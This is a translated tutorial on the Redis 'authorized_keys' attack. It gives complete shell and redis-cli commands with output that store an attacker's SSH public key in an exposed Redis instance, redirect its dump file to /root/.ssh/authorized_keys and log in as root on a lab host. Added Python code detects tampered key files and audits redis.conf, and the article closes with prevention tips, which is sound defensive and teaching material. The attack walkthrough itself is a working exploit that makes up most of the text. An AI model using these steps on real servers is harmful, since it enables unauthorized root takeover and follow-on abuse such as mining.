This article explains the principle behind Redis "mining" compromises. It demonstrates how Redis can be used to escalate privileges and obtain the root user of a remote server, and how to protect against it. I hope it is helpful to everyone.
Today we will demonstrate how to obtain the root user of a remote server through privilege escalation via Redis.
1. First we need some prerequisites
Condition 1: There must be a Redis instance, and we must know its port (default 6379);
Condition 2: The Redis password must not be too complex, or there is no password at all;
Condition 3: The user who starts Redis should preferably be the root user, which is more destructive;
2. Start making trouble
2.1 Create a key pair
    root@kali:/usr/local/src# ssh-keygen
    Generating public/private rsa key pair.
    Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Next, the attack key value is generated from the public key.
    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
The content is as follows:
    root@kali:/tmp/rediskey# cat foo.txt
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
The two newlines before and after the key keep it from running together with other data, which would cause a failure.
2.2 Configure Key to Redis
    root@kali:/tmp/rediskey# cat foo.txt | redis-cli -h 192.168.243.129 -x set bar
    OK
Log in to Redis to check whether it has been written.
    root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
    192.168.243.129:6379> get bar
    "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
2.3 Replace system files through the Redis saving mechanism
    192.168.243.129:6379> config set dir /root/.ssh
    OK
    192.168.243.129:6379> config get dir
    1) "dir"
    2) "/root/.ssh"
    192.168.243.129:6379> config set dbfilename "authorized_keys"
    OK
    192.168.243.129:6379> save
    OK
    192.168.243.129:6379> exit
At this point, we log in to the remote host to see the effect.
    root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
    The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
    ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
    Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
    Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
    root@kali:~#
OK, we have successfully escalated our privileges. So what is the exported file? In fact, it is just Redis's saved file format. If you are interested, you can open it yourself and have a look; it is not shown here.
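Because the file written in 2.3 is a Redis dump rather than a plain key list, a defender can recognise it on disk. The following is an added detection example, not code from the original article: it flags an authorized_keys file that starts with the RDB magic ("REDIS" plus a four-digit version) or contains binary lines, and lists the comment field of each key it finds. The function name and both sample byte strings are constructed for illustration.

```python
import re

# An RDB dump begins with the ASCII magic "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"\AREDIS\d{4}")
# Key types accepted in authorized_keys (options may precede the type).
KEY_RE = re.compile(
    rb"(?:^|\s)(ssh-rsa|ssh-ed25519|ecdsa-sha2-nistp\d+|sk-[\w.@-]+)"
    rb"\s+[A-Za-z0-9+/=]+(?:[ \t]+([^\n]*))?"
)

def is_binary(line: bytes) -> bool:
    """True if the line holds bytes a text key file never contains."""
    return any((b < 0x20 and b != 0x09) or b > 0x7E for b in line.rstrip(b"\r"))

def inspect_authorized_keys(data: bytes) -> dict:
    """Classify the raw bytes of an authorized_keys file."""
    lines = data.split(b"\n")
    binary_lines = [n for n, line in enumerate(lines, 1) if is_binary(line)]
    key_comments = []
    for line in lines:
        match = KEY_RE.search(line)
        if match and not line.lstrip().startswith(b"#"):
            comment = match.group(2) or b""
            key_comments.append(comment.decode("ascii", "replace").strip())
    rdb_header = bool(RDB_MAGIC.match(data))
    return {
        "rdb_header": rdb_header,        # file is a Redis dump
        "binary_lines": binary_lines,    # 1-based numbers of non-text lines
        "key_comments": key_comments,    # comment field of each key, for review
        "suspicious": rdb_header or bool(binary_lines),
    }

# Constructed sample: RDB-style header and trailer around a padded key line.
SAMPLE_TAMPERED = (
    b"REDIS0009\xfa\tredis-ver\x055.0.3\xfe\x00\xfb\x01\x00\x00\x03bar@\x9c"
    b"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABconstructed root@kali\n\n\n\n"
    b"\xff\x01\x02\x03\x04\x05\x06\x07\x08"
)
# Constructed sample: an ordinary key file.
SAMPLE_CLEAN = b"# ops team\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5constructed alice@bastion\n"

if __name__ == "__main__":
    for name, blob in (("tampered", SAMPLE_TAMPERED), ("clean", SAMPLE_CLEAN)):
        print(name, inspect_authorized_keys(blob))
```

To check a real host, pass the bytes of each account's ~/.ssh/authorized_keys to inspect_authorized_keys and review any file reported as suspicious.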
3. How to prevent
This vulnerability is quite powerful. Here we only took over one host; what if it were added to scheduled tasks to execute some scripts, and then used for batch infection? Tips for prevention are as follows:
- Redis should not listen on dangerous IPs. If it does, add firewall controls;
- Redis password restrictions must be tightened; weak passwords are not allowed;
- Try not to start Redis as the root user.
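The three tips above can be checked mechanically. The following is an added example, not code from the original article: it audits the text of a redis.conf and the UID the server runs as, and returns one finding code per violated tip. The weak-password list, the 16-character minimum and both sample configurations are assumptions constructed for illustration.

```python
import shlex

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
WEAK_PASSWORDS = {"redis", "123456", "password", "admin", "root", "foobared"}  # constructed list
MIN_PASSWORD_LEN = 16  # assumed policy threshold, not a Redis rule

def parse_redis_conf(text):
    """Return {directive: [args]}; this parser keeps the last occurrence."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            name, *args = shlex.split(line)
            conf[name.lower()] = args
    return conf

def audit(text, run_as_uid):
    """Return finding codes for the three prevention tips."""
    conf, findings = parse_redis_conf(text), []
    # Tip 1: without a bind directive Redis listens on every interface.
    addrs = [a.lstrip("-") for a in conf.get("bind", [])]
    if not addrs or any(a not in LOOPBACK for a in addrs):
        findings.append("BIND_EXPOSED")  # restrict the address or firewall the port
    # Tip 2: a password must be set and must not be weak.
    password = (conf.get("requirepass") or [""])[0]
    if not password:
        findings.append("NO_PASSWORD")
    elif password.lower() in WEAK_PASSWORDS or len(password) < MIN_PASSWORD_LEN:
        findings.append("WEAK_PASSWORD")
    # Tip 3: the server process should not run as root (UID 0).
    if run_as_uid == 0:
        findings.append("RUNS_AS_ROOT")
    return findings

# Constructed sample: the situation the prerequisites in section 1 describe.
WEAK_CONF = "bind 0.0.0.0\nport 6379\n# requirepass foobared\n"
# Constructed sample: loopback only, long passphrase.
HARDENED_CONF = (
    "bind 127.0.0.1 -::1\nport 6379\n"
    'requirepass "constructed-Example-Passphrase-42"\n'
)

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF, run_as_uid=0))
    print("hardened:", audit(HARDENED_CONF, run_as_uid=999))
```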